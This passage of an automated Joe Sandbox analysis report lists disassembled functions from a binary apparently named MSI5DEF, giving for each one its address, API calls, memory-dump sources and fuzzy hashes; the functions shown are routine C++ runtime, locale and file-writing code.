                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00AF797F
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7996
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF79B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 947293becc10e071cd4deeb6471eddb161178d5f56731e77f379425ec56a74b1
                                                                        • Instruction ID: 0acb2f07c98cea7a60e7c4c6bc908d6ca218687ec5b541b47690f27b8ebdbe29
                                                                        • Opcode Fuzzy Hash: 947293becc10e071cd4deeb6471eddb161178d5f56731e77f379425ec56a74b1
                                                                        • Instruction Fuzzy Hash: 6701927590461D9BCB05EBA8DA46ABE7BB1AF85310F240449F6106B3D2DF749F028BA1
                                                                        Function 00B03956 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B0395D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03967
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00B039A1
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B039B8
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B039D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 67d5211c509d0f4e548f1d0c4a03b66f1293de350a51d8af65be34d85cd705fc
                                                                        • Instruction ID: fed44c35a54de6b7c3bae6fd2f4f584c527dd188336fe6e613dc10ef5823330e
                                                                        • Opcode Fuzzy Hash: 67d5211c509d0f4e548f1d0c4a03b66f1293de350a51d8af65be34d85cd705fc
                                                                        • Instruction Fuzzy Hash: 9101D2359006199BCF01EBA8C94A6BE7BF9EF85720F250449F5116B2D1DF749F02CB91
                                                                        Function 00B03BAA Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03BB1
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03BBB
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00B03BF5
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03C0C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03C2C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 07e9cb2c598c4284f7d3c2302d5039a630c0831b7cb094360a45951bfd1bb857
                                                                        • Instruction ID: 8c29fef18888afc0bd408a2ff8eac6551fcc7ce72513e3bd8add89f01c2fbcc2
                                                                        • Opcode Fuzzy Hash: 07e9cb2c598c4284f7d3c2302d5039a630c0831b7cb094360a45951bfd1bb857
                                                                        • Instruction Fuzzy Hash: 9B01D27590061ADBCB11EBA4CA4A6BE7BF5EF84710F240449F610AB2D2DF749F028B90
                                                                        Function 00B03B15 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03B1C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03B26
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00B03B60
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03B77
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03B97
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: f7b8be8fa312d1e0bfb73981090a08fa03c5708ecc2d8be6ba9bce923666c7ae
                                                                        • Instruction ID: 1a29decb766b1e249d3a085dc3225c71d791baf806de94603c3971f6a4927734
                                                                        • Opcode Fuzzy Hash: f7b8be8fa312d1e0bfb73981090a08fa03c5708ecc2d8be6ba9bce923666c7ae
                                                                        • Instruction Fuzzy Hash: F401D275900A19DBCB01EBA4C9497BEBBF5AF84710F240489F614AB3D2DF349F028B91
                                                                        Function 00AF7CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7CB9
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7CC3
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7CFD
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7D14
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7D34
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 2da5e0ec75f7a73414ec0b08ea48c8bdf170c6f789333494edd84a8888b764c4
                                                                        • Instruction ID: efd728c3193e0741bd355be6a34f91f9a9f424e59ae6dd29b82ecd77ce208686
                                                                        • Opcode Fuzzy Hash: 2da5e0ec75f7a73414ec0b08ea48c8bdf170c6f789333494edd84a8888b764c4
                                                                        • Instruction Fuzzy Hash: 3901C03590461E9BCB01EBE4DA456BE7BA5BF88310F240509FA116B292DF349E028B90
                                                                        Function 00AF7C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7C24
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7C2E
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7C68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7C7F
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 69f8804389be94568c3f2f1af604a535bc188b5e7449cd13debdc52d1a877a75
                                                                        • Instruction ID: 8bf5898dc948c19964bea5982ce02fee9f3228a24ee83d1c16c55e0360590ca9
                                                                        • Opcode Fuzzy Hash: 69f8804389be94568c3f2f1af604a535bc188b5e7449cd13debdc52d1a877a75
                                                                        • Instruction Fuzzy Hash: 1D01D23590461D8BCB11EBB4DA467BE7BB1AF84310F240409F6106B3D2CF349E028B90
                                                                        Function 00AF7DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7DE3
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7DED
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7E27
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7E3E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7E5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 5ae6963baa0e9e40bc77d00ea071647ba0845e69acf57a1cde9c70e3a2c2c705
                                                                        • Instruction ID: 69ecbd43b829072794d5f85bc8bd6fd3bf7ccaf4c7c0a5384b4ba82cd9d9f8f8
                                                                        • Opcode Fuzzy Hash: 5ae6963baa0e9e40bc77d00ea071647ba0845e69acf57a1cde9c70e3a2c2c705
                                                                        • Instruction Fuzzy Hash: DD01D23590461D9BCB11EBA4D945ABE7BB1BF88710F24044AF611AB3D2CF349F02DB91
                                                                        Function 00AF7D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7D4E
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7D58
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7D92
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7DA9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: c8ce8f367ad5793c2e0485709e86a2f77f2fd3f15bae57ac336a128d96802a0a
                                                                        • Instruction ID: c7bfd082f3a6445a2acae00b2ab9ccb5c411b348309e4e2be162edd18c0a3058
                                                                        • Opcode Fuzzy Hash: c8ce8f367ad5793c2e0485709e86a2f77f2fd3f15bae57ac336a128d96802a0a
                                                                        • Instruction Fuzzy Hash: 6F01D235D0061D8BCB01EBA4CA46ABE7BB2BF88310F240009F6106B3D2DF349E029BD1
                                                                        Function 00B0782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07835
                                                                        • LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07868
                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00B078DF
                                                                        • SetEvent.KERNEL32(?,00AE2627,00B4571C,00B2CCC0), ref: 00B078E9
                                                                        • ResetEvent.KERNEL32(?,00AE2627,00B4571C,00B2CCC0), ref: 00B078F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                        • String ID:
                                                                        • API String ID: 3916383385-0
                                                                        • Opcode ID: 21d4edc7cb29f1b7b0d48617b75a8ad0b404a788c8d19fc133662df2e27f47c0
                                                                        • Instruction ID: b4d0d34fd60ee257aa7b7eb2f550aede36a23bf9e86834462e043070101bb25a
                                                                        • Opcode Fuzzy Hash: 21d4edc7cb29f1b7b0d48617b75a8ad0b404a788c8d19fc133662df2e27f47c0
                                                                        • Instruction Fuzzy Hash: 34018C39A45620DFCB24AF18FC49BA57BA4FB0A701B05406AE80293370CF716E12DBD4
                                                                        Function 00AE6090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AE60F4
                                                                        • GetLastError.KERNEL32 ref: 00AE6190
                                                                          • Part of subcall function 00AE1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00B2938D,000000FF,?,80070057,?,?,00000000,00000010,00AE1B09,?), ref: 00AE2040
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00B3B2DC,00000001,00000000), ref: 00AE614E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                        • String ID: ntdll.dll
                                                                        • API String ID: 4113295189-2227199552
                                                                        • Opcode ID: cb3f78696dc53843f0841361fb9f7305ebf58cd73796623add54a2bfd926d747
                                                                        • Instruction ID: 2987ba839d3bc36619a4cf9ad1364fc41c1b98741374b828458c955e39edd0cc
                                                                        • Opcode Fuzzy Hash: cb3f78696dc53843f0841361fb9f7305ebf58cd73796623add54a2bfd926d747
                                                                        • Instruction Fuzzy Hash: 1431B071A006489BD720DF69CC45BAEBBF8BF54710F148A1DE429D72D1EBB0A904CB91
                                                                        Function 00AFD2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFD2C9
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7019
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7036
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7053
                                                                          • Part of subcall function 00AF6FF9: _Maklocchr.LIBCPMT ref: 00AF7065
                                                                          • Part of subcall function 00AF6FF9: _Maklocchr.LIBCPMT ref: 00AF7078
                                                                        • _Mpunct.LIBCPMT ref: 00AFD356
                                                                        • _Mpunct.LIBCPMT ref: 00AFD370
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2939335142-1686923651
                                                                        • Opcode ID: 96f0a159b258866b5f5c5f24e16f18312891d3921b7c37deb9859bbb04b20f30
                                                                        • Instruction ID: 20a17f55cd7d297c7f16379e9d063ffd1242f65246ddf53862513cdc05f2f469
                                                                        • Opcode Fuzzy Hash: 96f0a159b258866b5f5c5f24e16f18312891d3921b7c37deb9859bbb04b20f30
                                                                        • Instruction Fuzzy Hash: 0E2192B1904B966ED726DFB5849077BBEF8AB0D300B044A5AF199C7A42E734E601CB90
                                                                        Function 00B04DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 4281374311-1686923651
                                                                        • Opcode ID: 2d027a29e0e3f4569bfd55941fe4a5397413f21a1fcdd182de6292aa68c39efe
                                                                        • Instruction ID: ced007346ec22a882cc27a42cab4e2f7de9094420ca3c59c532ed402e4c29f9a
                                                                        • Opcode Fuzzy Hash: 2d027a29e0e3f4569bfd55941fe4a5397413f21a1fcdd182de6292aa68c39efe
                                                                        • Instruction Fuzzy Hash: D521B5B1904B966ED725DF74C49077B7EF8BB0C700F04455AE159C7A41D734E601CB90
                                                                        Function 00B0C012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B0BFC3,00000000,?,00B44EA4,?,?,?,00B0C166,00000004,InitializeCriticalSectionEx,00B2F92C,InitializeCriticalSectionEx), ref: 00B0C01F
                                                                        • GetLastError.KERNEL32(?,00B0BFC3,00000000,?,00B44EA4,?,?,?,00B0C166,00000004,InitializeCriticalSectionEx,00B2F92C,InitializeCriticalSectionEx,00000000,?,00B0BF1D), ref: 00B0C029
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B0C051
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 76dfb2de2921f678ca7560936b258ea8f82f9bfee24e01426757e7707651d202
                                                                        • Instruction ID: 071c2c77ff2141d1be76f28e1e0b901f31ffdfa628a4ce303a21ecf8474fac64
                                                                        • Opcode Fuzzy Hash: 76dfb2de2921f678ca7560936b258ea8f82f9bfee24e01426757e7707651d202
                                                                        • Instruction Fuzzy Hash: DDE01A30280208F7EF201B60EC06B5A3FA99B00B51F204470FA0CE84E0EBA1A892D6C8
                                                                        Function 00AEE350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLocal_strcspn
                                                                        • String ID:
                                                                        • API String ID: 2585785616-0
                                                                        • Opcode ID: 7acded27577e603cc539757f10b79217bd226ae4bd3c88c569dfbe77286da03a
                                                                        • Instruction ID: f3d16c8336bc7c4131e7dc987a0f16bcb4c9a978482d495addcb6b0963dd769d
                                                                        • Opcode Fuzzy Hash: 7acded27577e603cc539757f10b79217bd226ae4bd3c88c569dfbe77286da03a
                                                                        • Instruction Fuzzy Hash: CBF13875A00289DFDF14CFA9C984AEEBBF5FF48304F144169E815AB261D731AA45CB60
                                                                        Function 00B2738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(1816BA6E,?,00000000,?), ref: 00B273EE
                                                                          • Part of subcall function 00B2002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B1C527,?,00000000,-00000008), ref: 00B200D7
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B27649
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B27691
                                                                        • GetLastError.KERNEL32 ref: 00B27734
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: b697603f96c31790778e7dae5865e161bc6eb36b58b2812506aeeb5e61b693b7
